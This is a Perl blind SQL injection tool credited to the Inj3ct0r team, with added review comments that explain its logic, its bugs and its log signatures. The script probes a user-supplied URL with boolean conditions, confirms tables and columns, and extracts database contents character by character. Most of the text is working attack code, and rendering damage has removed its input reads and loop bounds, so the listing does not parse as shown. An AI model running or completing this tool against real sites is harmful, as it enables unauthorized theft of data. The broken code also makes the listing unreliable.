
Perl Blind SQL injection by Inj3ct0r PERL


>#!/usr/bin/perl
use LWP::Simple;
use Time::HiRes qw(gettimeofday);
###############################################################
# NOTE(review): the leading ">" on the shebang line and the missing
# angle-bracket tokens further down (every STDIN read and every `for`
# loop bound) are rendering damage; the listing does not parse as shown.
# There is also no `use strict; use warnings;`, so every undeclared name
# below ($limit, @ascii_sym, $glob_stat, $condition, ...) is a package
# global and typos are never reported.

     $string='';      # marker text that tells the TRUE page from the FALSE page (see strc)
     $limit=0;        # row offset used in the `limit $limit,1` clauses below
      
#string variable###############################################
#       if the string that you want to use is not writable #
#          on the shell you can write in this variable and    #
#       whene the script order from you the variable just  #
#       press enter.                          #
###############################################################

#limit variable##############################################
#       if you want a particular column just change this #
#       variable.                                   #
#############################################################


# ASCII codes of the printable punctuation characters (32-47, 58-64,
# 91-96, 123-126), 33 entries; brute_sym()/opt_sym() index into this table.
@ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126);          
# Bare expression statement: it does nothing.  strc() assigns $glob_stat
# later (1 = marker found on the TRUE page, 0 = on the FALSE page).
$glob_stat;                                                  

print "\n\t===============================================*\n";
print "\t*      Blind Sql Injection Tool                *\n";
print "\t*      Coded By Angel Injection                *\n";
print "\t*      Member From Inj3ct0r Team               *\n";
print "\t* Thanks To:r0073r,Sid3^effects,r4dc0re,CrosS, *\n";
print "\t===============================================*\n\n";

print "Stage 1:Checking if the target is vulnerable\n\n";
print "You should now enter the infected url\n";
print "Example :http://www.localhost/index.php?id=1\n\n";
print "URL: ";
my $url = ;          # NOTE(review): the STDIN read was lost in rendering
chomp($url);
# Time a single request; $exect (seconds per request) feeds the
# "expected time" estimate in stage 3-2.
$now = time_mili();
# Two plain GETs with `+and+1=1` / `+and+1=0` appended verbatim to the URL:
# the classic boolean-probe pair, and an easy signature to spot in access
# logs.  LWP::Simple::get returns undef on any failure; that is passed on
# to def() unchecked.
my $yes = get("$url+and+1=1");
$later = time_mili();
$exect = $later - $now;
$exect = sprintf("%.2f", $exect);
my $no = get("$url+and+1=0");
# def() diffs the two pages, writes the differing text to string.txt, and
# exit()s when the pages look alike.
def($yes,$no);
print "Stage 2 :
[*]Checking For A String That Can lead To exploit The Target
[*]\n\n";
print "             You should now enter a string(from shell or source code)\n";
print "             and wait to see if is a good one. Your string must be \n";
print "             related to the target\n\n";
print "             The string must exist on the true page or the false page \n";
print "             but not on both of them.\n";
print "             A file has been created under the name string.txt it may help\n";
print "             you to choose your string\n\n";

# With $string left empty at the top of the file, prompt until strc()
# accepts a marker (strc() also records in $glob_stat which of the two
# pages carries it).  NOTE(review): $string is later interpolated into
# regexes unescaped, so regex metacharacters in the marker change what is
# matched, and an invalid pattern dies.
if($string eq ''){
print "String: ";
$string = ;          # NOTE(review): STDIN read lost in rendering
chomp($string);
while(strc($yes,$no)!=1){
print "String: ";
$string = ;          # NOTE(review): STDIN read lost in rendering
chomp($string);
}
}
else{
# A marker hard-coded at the top of the file gets one check, then exit.
if(strc($yes,$no)!=1){
print "Please Choose another one\n: ";
exit;
}
}
chomp($string);
print "\n => Nice choice\n\n";

print "Stage 3 :
[*]Extracting Information From Database
[*]\n\n";
print "             You should now enter The Table name\n";
print "             and number of Columns to be extracted\n";  
print "             and their names and condition on this columns\n";    
print "             if you want it\n\n";        
    
print "Table Name : ";
my $tbname = ;       # NOTE(review): STDIN read lost in rendering
chomp($tbname);
print "Columns Number : ";
my $num = ;          # NOTE(review): STDIN read lost in rendering
chomp($num);
# Only the column count is validated (an optionally signed integer); the
# table, column and condition strings are used verbatim.
if($num =~ /^[+-]?\d+$/){
chomp($num);
}
else{
while($num !~ /^[+-]?\d+$/){
print "Columns Number : ";
$num = ;             # NOTE(review): STDIN read lost in rendering
chomp($num);
}
}
chomp($num);
# NOTE(review): without parentheses `my` applies to @column only; the other
# three are globals, and @trcolmun is a typo for the @trcolumn used below
# (harmless only because strict is off).
my @column,@trcolmun,@numtr,@result;
for(my $q=0;$qprint "Columns Name : ";     # NOTE(review): loop bound and prompt fused by rendering
$column[$q] = ;      # NOTE(review): STDIN read lost in rendering
chomp($column[$q]);
}

print "\n             Do You have any condition on your information\n";
print "             Exemple:  where id=1\n\n";
print "(yes/no): ";
my $condt = ;        # NOTE(review): STDIN read lost in rendering
chomp($condt);
# $condition is a global; when the answer is not exactly "yes" it stays
# undef and interpolates as an empty string in every later query.
if($condt eq 'yes'){
print "\nEnter Condition: ";
$condition=;         # NOTE(review): STDIN read lost in rendering
chomp($condition);
}
print "\nStage 3-1 :
[*]Checking table and columns
[*]\n\n";
print "               Nothing That You Can do it now\n";
print "               just let the script do his job\n\n";
# One request per check from here on: chvar() returns 1 when the response
# matches the TRUE page.  The table probe selects a constant from the table.
my $pr=chvar("$url+and+(SELECT 1 from $tbname limit 0,1)=1");
if($pr==1){
print " => Table Existe\n";
}
else{
print " => Table Dosn't Existe";
exit;
}
# $j counts the columns that passed; this lexical shadows the global $j that
# def() increments.
my $j=0;
for(my $q=0;$q$pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1");     # NOTE(review): loop bound lost in rendering
if($pr==1){
$trcolumn[$j] = $column[$q];      # @trcolumn is a global: the confirmed columns
print " => Column $column[$q] Existe\n";
$j++;
}
else{
print " => Column $column[$q] Dosn't Existe\n";
}
}
$trco = @trcolumn;                # array in scalar context: number of confirmed columns
if($trco==0){
print "\n => No Columns Found\n";
exit;
}

print "\nStage 3-2 :
[*]Extracting Columns length
[*]\n\n";
print "               The Script is going now to get each\n";
print "               columns length\n";
print "\nCounting length of Columns...\n\n";
# For each confirmed column: advance $ii one request per position until two
# consecutive positions both read as ':' (ASCII 58).  The value is wrapped
# with concat(...,0x3a,0x3a), so "::" marks its end.  A blocked or failing
# request is not distinguished from a normal answer (see chvar), so this
# loop can also run past the real length.
for(my $q=0;$qmy $qj=0;              # NOTE(review): loop bound lost in rendering
my $ii=1;
while($qj==0){
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$ii++;
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$qj=1;
}
else{
$ii--                  # single ':' inside the value: step back and keep scanning
}
}
$ii++;
}
# When the loop ends $ii is two past the first ':'; subtracting 3 leaves
# the number of characters before the terminator.
$ii -=3;
$numtr[$q]=$ii;
print " => $trcolumn[$q] : $ii\n";
}
for(my $rul=0;$rul$result[$rul]='';      # NOTE(review): loop bound lost in rendering
}
# Total estimated seconds across all columns.
$gtf=0;
($second, $minute, $hour) = localtime();        # list context: (sec, min, hour, ...)
print "\nExtracting information ...\n\n";
print "Guessing time for each column(in seconds)\n\n";
# Estimate per column: length x seconds-per-request (from stage 1) x 8;
# the 8 is presumably a budget of about eight probes per character.
for(my $idn=0;$idn$max = $numtr[$idn] * $exect * 8;       # NOTE(review): loop bound lost in rendering
$max=sprintf("%.2f", $max);
$gtf+=$max;
print " #=> $trcolumn[$idn] max time of extraction = $max\n";
}
print "\nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)\n\n";
$now1 = time_mili();
# Per column, per position: opt() resolves one character through several
# requests and returns its ASCII code; pack("c") turns the code into a byte.
# Here the value is wrapped with a single 0x3a (':') terminator.
for(my $bn=0;$bn$nowt =  time_mili();     # NOTE(review): loop bound lost in rendering
for(my $bnum=1;$bnummy $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))");     # NOTE(review): loop bound lost in rendering
$result[$bn].=pack("c",$ascii);
}
$latert = time_mili();
$realt = $latert - $nowt;
$realt=sprintf("%.2f", $realt);
print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)\n";
}
$later1 = time_mili();
$exect1 = $later1 - $now1;
$exect1 = sprintf("%.2f", $exect1);
($second, $minute, $hour) = localtime() ;
print "\nFinish at $hour:$minute:$second  (elapsed time (in seconds) : $exect1) \n\n";

sub opt{
# Resolve one character position to its ASCII code.
# $_[0] is a probe URL ending in `ascii(substring(...))`; a comparison
# suffix (">57", ">96") is appended and each is sent through chvar(), i.e.
# every comparison is one more HTTP GET with the same URL prefix and a
# different numeric literal — a very regular pattern in server logs.
my $url=$_[0];
my $isnum = $url;
my $sym_st;                     # punctuation bucket for opt_sym(): 1 / 2 / 3
$isnum .= ">57";                # above '9'  -> not a digit
my $isalpha = $url;
$isalpha .= ">96";              # above '`'  -> lowercase range
my $isAlpha = $url;
$isAlpha .= ">65";              # built but never used
my $rt='';
my $brp = chvar($isnum);
if($brp==1){
my $brp1 = chvar($isalpha);
if($brp1==1){
$rt = brute_alpha($url,97,103,110,115,122);   # 'a'..'z' with three split points
$sym_st=3;
}
else{
$rt = brute_alpha($url,65,71,78,83,90);       # 'A'..'Z' with three split points
$sym_st=2;
}
}
else{
$rt = brute_num($url);
$sym_st=1;
}

# brute_num()/brute_alpha() yield an empty or undefined value when no
# candidate matched; ord() of that is 0, so fall back to the punctuation
# table for the bucket chosen above.
if(ord($rt) == 0){
$rt = opt_sym($url,$sym_st);
}
return $rt;
}

sub opt_sym(){
# Punctuation fallback for opt().  $_[0] is the probe URL, $_[1] the bucket:
#   1 (digit path failed)     -> ">40" decides between @ascii_sym[8..15] and [0..7]
#   2 (uppercase path failed) -> @ascii_sym[16..22]
#   anything else             -> @ascii_sym[23..32]
# NOTE(review): the `()` prototype is declared after its call site in opt(),
# so it is never enforced; prototypes are not an argument check anyway.
my $url = $_[0];
my $rt='';
if($_[1]==1){
my $ft = $url;
$ft .= ">40";
my $rft = chvar($ft);           # one more request
if($rft==1){
$rt = brute_sym($url,8,15);
}
else{
$rt = brute_sym($url,0,7);
}
}
else{
if($_[1]==2){
$rt=brute_sym($url,16,22);
}
else{
$rt=brute_sym($url,23,32);
}
}
return $rt;
}

sub reduse{
# Linear scan: for each candidate code $i starting at $_[0], append "=$i"
# to the probe URL ($_[2]) and ask chvar(); return the first code that
# matches.  One request per candidate.
for(my $i=$_[0];$imy $tmp = $_[2];     # NOTE(review): loop bound lost in rendering
$tmp .="=$i";
my $qq = chvar($tmp);
if($qq==1){
return $i;
last;                               # unreachable: `return` already left the sub
}
}
# No explicit return when nothing matched: callers see an empty/false value.
}

sub brute_sym(){
# Scan @ascii_sym from index $_[1] upward, one request per candidate, and
# return the ASCII code of the first punctuation mark that matches.
# NOTE(review): when nothing matches $ek stays undef and $ascii_sym[undef]
# silently yields element 0 (code 32, a space), so a failed or blocked
# probe is reported as a space instead of an error.
my $ek;
for(my $i=$_[1];$imy $tmp = $_[0];     # NOTE(review): loop bound lost in rendering
$tmp .="=$ascii_sym[$i]";
my $qq = chvar($tmp);
if($qq==1){
$ek=$i;
last;
}
}
return $ascii_sym[$ek];
}

sub brute_num(){
# Digit branch of opt(): one ">52" comparison splits '0'..'9' into two
# halves, then reduse() scans the chosen half linearly.
my $url = $_[0];
my $ft = $url;
my $rt='';
$ft .= ">52";
my $mrp = chvar($ft);
if($mrp==1){
$rt = reduse(53,57,$url);
}
else{
$rt = reduse(48,52,$url);
}
return $rt;
}

sub brute_alpha(){
# Letter branch of opt().  Arguments: URL, low bound, three split points,
# high bound.  Up to three ">split" comparisons narrow the code to one of
# four sub-ranges; reduse() then scans that sub-range one request per code.
my $url = $_[0];
my $ft = $url;
my $sd = $url;
my $td = $url;
my $rt ='';
$ft .= ">$_[2]";
$sd .= ">$_[3]";
$td .= ">$_[4]";
my $mrp = chvar($ft);
if($mrp==1){
my $mrp1 = chvar($sd);
if($mrp1==1){
my $mrp2=chvar($td);
if($mrp2==1){
$rt = reduse(($_[4]+1),$_[5],$url);
}
else{
$rt = reduse(($_[3]+1),$_[4],$url);
}
}
else{
$rt = reduse(($_[2]+1),$_[3],$url);
}
}
else{
$rt = reduse($_[1],$_[2],$url);
}
return $rt;
}


sub strc{
# Decide whether the marker $string separates the two pages ($_[0] = TRUE
# page, $_[1] = FALSE page).  Returns 1 and records in $glob_stat which page
# carries the marker (1 = TRUE page, 0 = FALSE page); returns 0 when both
# pages carry it.  When neither page carries it there is no explicit return.
# NOTE(review): $string is interpolated into the pattern unescaped, so it is
# treated as a regex, not as literal text.
my $tmp=0;                       # unused
if(($_[0] =~ /$string/) && ($_[1] !~ /$string/)){
$glob_stat=1;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] !~ /$string/)){
$glob_stat=0;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] =~ /$string/)){
return 0;
}
}

sub def{
# Compare the TRUE page ($_[0]) with the FALSE page ($_[1]) character by
# character: $j counts positions that differ, $rt collects the differing
# characters of the first page.  Prints a verdict and exit()s on "not
# vulnerable".  Both arguments are undef when the GETs in stage 1 failed.
my @fi = split(//,$_[0]);
my @sd = split(//,$_[1]);
my $rt='';
my $cn = @fi;                    # lengths (array in scalar context)
my $cn1 = @sd;
my $k;
# NOTE(review): assignment binds looser than ?:, so this parses as
# `(... ? $k=$cn : $k) = $cn1` and $k always ends up equal to $cn1.
($cn>$cn1) ? $k=$cn : $k=$cn1;
my $i,$j=0;                      # only $i is lexical; $j is a global
for($i=0;$iif($fi[$i] ne $sd[$i]){     # NOTE(review): loop bound and `if` fused by rendering
$rt.=$fi[$i];
$j++;
}
}
# NOTE(review): the upper bound of the $j window was lost in rendering.
if(($j>5) && ($jprint "\n => Target Maybe Vulnerable\n\n";
# NOTE(review): bareword handle, two-argument open, no error check: if
# string.txt cannot be created the print below goes nowhere, silently.
open(MYFILE,'>string.txt');
print MYFILE $rt;
close(MYFILE);
}
else{
print "\n => Target Not Vulnerable\n\n";
exit;
}
}

sub chvar{
# One HTTP GET of the probe URL $_[0]; returns 1 when the response looks
# like the TRUE page and 0 when it looks like the FALSE page, using the
# marker $string and the orientation strc() stored in $glob_stat.
# NOTE(review): LWP::Simple::get returns undef on any HTTP or network
# failure, and undef matches nothing — so a blocked, throttled or erroring
# request is indistinguishable from a real answer and the callers keep
# going with wrong data.  There is no retry, no status check and no delay
# between requests.  If $glob_stat is neither 0 nor 1 the sub returns
# nothing.
my $url=$_[0];
my $tmp = get($url);
if($tmp=~/$string/){
if($glob_stat==1){
return 1;
}
elsif($glob_stat==0){
return 0;
}
}
elsif($tmp!~/$string/){
if($glob_stat==1){
return 0;
}
elsif($glob_stat==0){
return 1;
}
}
}

sub time_mili(){
    # Current wall-clock time as a number with at most three fractional digits.
    # NOTE(review): seconds and microseconds are glued together as the string
    # "$sec.$usec" and the microsecond part is not zero-padded, so e.g. 5 µs
    # reads as ".5" — the fraction is wrong whenever usec < 100000.  Kept as
    # is: the callers only use the value for coarse elapsed-time figures.
    my ($sec, $usec) = gettimeofday();
    my $glued = "$sec.$usec" + 0;
    return sprintf("%.3f", $glued) + 0;
}
 